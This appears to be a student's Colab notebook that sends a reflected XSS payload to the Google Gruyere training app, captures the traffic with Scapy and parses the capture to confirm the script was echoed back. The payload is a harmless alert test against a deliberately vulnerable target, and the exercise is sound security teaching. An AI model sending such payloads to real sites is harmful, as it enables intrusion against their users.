<a href="https://colab.research.google.com/github/vilavrenchuk/dz8/blob/main/%D0%92%D0%B8%D0%BA%D1%82%D0%BE%D1%80%D0%B8%D1%8F_%D0%9B%D0%B0%D0%B2%D1%80%D0%B5%D0%BD%D1%87%D1%83%D0%BA_%D0%94%D0%97_8_%D0%9F%D1%80%D0%BE%D0%B3%D1%80%D0%B0%D0%BC%D0%BC%D0%B8%D1%80%D0%BE%D0%B2%D0%B0%D0%BD%D0%B8%D0%B5.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

In [16]:
!apt-get install -y libpcap-dev tcpdump

!pip install scapy

import argparse
import socket
import threading
import time
import sys

from urllib.parse import urlparse
from scapy.all import sniff, wrpcap, rdpcap, Raw

print("Библиотеки установлены и импортированы.")

Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following additional packages will be installed:
  libdbus-1-dev libpcap0.8 libpcap0.8-dev
Suggested packages:
  apparmor
The following NEW packages will be installed:
  libdbus-1-dev libpcap-dev libpcap0.8 libpcap0.8-dev tcpdump
0 upgraded, 5 newly installed, 0 to remove and 2 not upgraded.
Need to get 1,108 kB of archives.
After this operation, 3,645 kB of additional disk space will be used.
Get:1 http://archive.ubuntu.com/ubuntu jammy-updates/main amd64 libpcap0.8 amd64 1.10.1-4ubuntu1.22.04.1 [145 kB]
Get:2 http://archive.ubuntu.com/ubuntu jammy-updates/main amd64 tcpdump amd64 4.99.1-3ubuntu0.2 [501 kB]
Get:3 http://archive.ubuntu.com/ubuntu jammy-updates/main amd64 libdbus-1-dev amd64 1.12.20-2ubuntu4.1 [188 kB]
Get:4 http://archive.ubuntu.com/ubuntu jammy-updates/main amd64 libpcap0.8-dev amd64 1.10.1-4ubuntu1.22.04.1 [270 kB]
Get:5 http://archive.ubuntu.com/ubuntu jammy-updates/

In [22]:
TARGET_HOST = "google-gruyere.appspot.com"
SESSION_ID = "652922640145625846561496262821869337282"
XSS_PAYLOAD = "/new_snippet?snippet=<script>alert('XSS_TEST')</script>"
TARGET_PATH = f"/{SESSION_ID}{XSS_PAYLOAD}"
PCAP_FILE = "xss_attack_log.pcap"
print(f"Цель настроена: {TARGET_HOST}{TARGET_PATH}")

Цель настроена: google-gruyere.appspot.com/652922640145625846561496262821869337282/new_snippet?snippet=<script>alert('XSS_TEST')</script>


In [23]:
def resolve_hostname(hostname):
  try:
    return socket.gethostbyname(hostname)
  except Exception as e:
    print(f"Ошибка DNS: {e}")
    return None

def capture_traffic_bg(hostname, timeout=10, output_file="traffic.pcap"):
  dest_ip = resolve_hostname(hostname)
  if not dest_ip:
    return

  print(f"\n[Sniffer] Старт перехвата для IP {dest_ip} (на {timeout} сек)...")

  packets = sniff(filter=f"host {dest_ip} and tcp port 80", timeout=timeout, iface="eth0")

  print(f"[Sniffer] Стоп. Поймано пакетов: {len(packets)}")

  if len(packets) > 0:
    wrpcap(output_file, packets)
    print(f"[Sniffer] Трафик записан в файл {output_file}")

In [24]:
def send_xss_attack(hostname, path):
  time.sleep(2)
  print(f"\n[Attacker] Отправляю XSS запрос на {hostname}...")

  try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(5)
    s.connect((hostname, 80))

    request = f"GET {path} HTTP/1.1\r\n"
    request += f"Host: {hostname}\r\n"
    request += "User-Agent: Python-Scapy-Student\r\n"
    request += "Connection: close\r\n\r\n"
    s.send(request.encode())
    response = s.recv(4096)

    print(f"[Attacker] Ответ от сервера получен ({len(response)} байт)")
    s.close()


  except Exception as e:
    print(f"[Attacker] Ошибка атаки: {e}")

In [25]:
sniffer_thread = threading.Thread(target=capture_traffic_bg, args=(TARGET_HOST, 10, PCAP_FILE))
sniffer_thread.start()
send_xss_attack(TARGET_HOST, TARGET_PATH)
sniffer_thread.join()
print("\n--- Эксперимент завершен ---")


[Sniffer] Старт перехвата для IP 142.251.183.153 (на 10 сек)...

[Attacker] Отправляю XSS запрос на google-gruyere.appspot.com...
[Attacker] Ответ от сервера получен (2505 байт)
[Sniffer] Стоп. Поймано пакетов: 10
[Sniffer] Трафик записан в файл xss_attack_log.pcap

--- Эксперимент завершен ---


In [26]:
import gzip
from io import BytesIO

def analyze_results(pcap_filename):
  print(f"\n[Analyzer] Читаю файл {pcap_filename}...")

  try:
    packets = rdpcap(pcap_filename)
  except FileNotFoundError:
    print("Файл не найден. Попробуйте запустить эксперимент снова.")
    return

  xss_marker = "<script>"
  text_marker = "XSS_TEST"

  found_req = False
  found_resp = False
  is_gzipped = False

  for pkt in packets:
    if pkt.haslayer(Raw):
      try:
        raw_bytes = pkt[Raw].load

        if raw_bytes.startswith(b'\x1f\x8b'):
          is_gzipped = True
          try:
            with gzip.GzipFile(fileobj=BytesIO(raw_bytes)) as f:
              payload = f.read().decode('utf-8', errors='ignore')

          except:
            continue

        else:
          payload = raw_bytes.decode('utf-8', errors='ignore')

        if xss_marker in payload or text_marker in payload:
          if "GET " in payload:
            print(f"\n[V] Найден ЗАПРОС с атакой (Packet #{pkt.id if hasattr(pkt, 'id') else '?'}):")
            print(f"    URL: {payload.splitlines()[0][:100]}...")
            found_req = True

        elif "HTTP/1.1 200" in payload:
          print("\n[V] Найдено ОТРАЖЕНИЕ в ответе сервера (Уязвимость подтверждена!):")

          if is_gzipped:
            print("(Ответ был сжат GZIP, но мы его распаковали)")

          idx = payload.find(text_marker)
          if idx != -1:
            context = payload[idx-50:idx+50].replace('\n', ' ')
            print(f"    Контекст: ...{context}...")
          found_resp = True

      except Exception as e:
        pass

  print("\n" + "="*30)
  if found_req and found_resp:
    print("ИТОГ: УСПЕХ! XSS-атака прошла, сервер вернул наш скрипт.")
  elif found_req and not found_resp:
    print("ИТОГ: Запрос отправлен, но ответ с кодом не найден.")
    print("Возможные причины:")
    print("1. ID сессии неверен (сервер вернул 404 или редирект).")
    print("2. Ответ пришел, но Scapy не смог его раскодировать.")
    if is_gzipped:
      print("(!) Замечен GZIP. Скорее всего, атака прошла, просто ответ сжат.")
  else:
    print("ИТОГ: Ничего интересного не найдено.")

analyze_results(PCAP_FILE)


[Analyzer] Читаю файл xss_attack_log.pcap...

[V] Найден ЗАПРОС с атакой (Packet #43550):
    URL: GET /652922640145625846561496262821869337282/new_snippet?snippet=<script>alert('XSS_TEST')</script> ...

[V] Найдено ОТРАЖЕНИЕ в ответе сервера (Уязвимость подтверждена!):

ИТОГ: УСПЕХ! XSS-атака прошла, сервер вернул наш скрипт.
